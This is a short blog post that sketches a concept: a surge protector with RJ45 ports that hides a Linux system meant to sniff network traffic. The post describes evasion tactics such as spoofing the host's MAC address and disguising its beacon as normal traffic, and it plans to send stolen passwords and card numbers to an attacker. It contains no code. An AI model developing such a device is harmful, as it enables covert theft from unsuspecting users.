Ethernet/RJ45 Surge Protector with Backdoor

After reading this:

Which looks like a prototype due to its size, I can see this as an interesting first step to onsite Cracking of Networks or home computers. What I envisage is a small Surge Protector that looks exactly like a normal surge protector with RJ45 outlets for protecting Ethernet cables. In would be plugged in the wall socket and looking like its doing nothing, just like a normal surge protector. But the onboard Linux system and built in Hub on the RJ45 ports can start monitoring the network and try to call “home” then watch the network traffic and when something interesting happens, forward that to the attacker. The Hub wouldn’t show a “link” status on any Other Ethernet Device until two Ethernet Devices are plugged in. Otherwise it would be a dead give away if a Link Light shows up on the PC, when plugged into the Surge Protector, but not into the users own Hub/Switch. Obviously this wouldn’t be an issue if an attacker was doing the “installing” but the benefit of this device is you can ask someone to do it for you. Its the old Physical Trojan Horse idea, give these to people on the street or even sell them! The customer takes it home, plugs it in, and no antivirus system is going to counteract it. Perfect!

Obviously the “call Home” wouldn’t want to show up on any networking monitoring. So it would need to look like normal traffic. And it wouldn’t want to show up on any Router as another DHCP client, so it would need to spoof the MAC address of the device or PC connected to it and watch out for any packets destined to it and not the device/PC plugged into it. That way there shouldn’t be any new “devices” shown on the network, so that no network monitor would pick it up. The Call Home should be a Google Search or something normal or a post on a well known website like that wouldn’t normally be picked up due to the large amount of content on that site.

The next step would be to send “interesting” information like bank accounts or credit card numbers or usernames and passwords. By keeping the filter simple, only looking for specific things, the amount of data that would need to be encrypted and sent to the attacker would be fairly small. Again lessening the chance of the device being picked up. Encrypting the password information would mean, even if someone in the IT department grabbed the packet, they wouldn’t think twice if it looked like a normal SSL transmission. Of course one option is to use the SMTP server of the client to send out an email with the attached passwords etc encrypted. Again, by doing something that looks perfectly normal, it wouldn’t show up on any monitoring system. The key is to become part of the noise of the internet, not a spike of something different. But to be the noise, the surge protector must listen to the noise and emulate it.

Either way, it shows that its almost impossible to keep data and your network safe. There is always a way around something.

David Robinson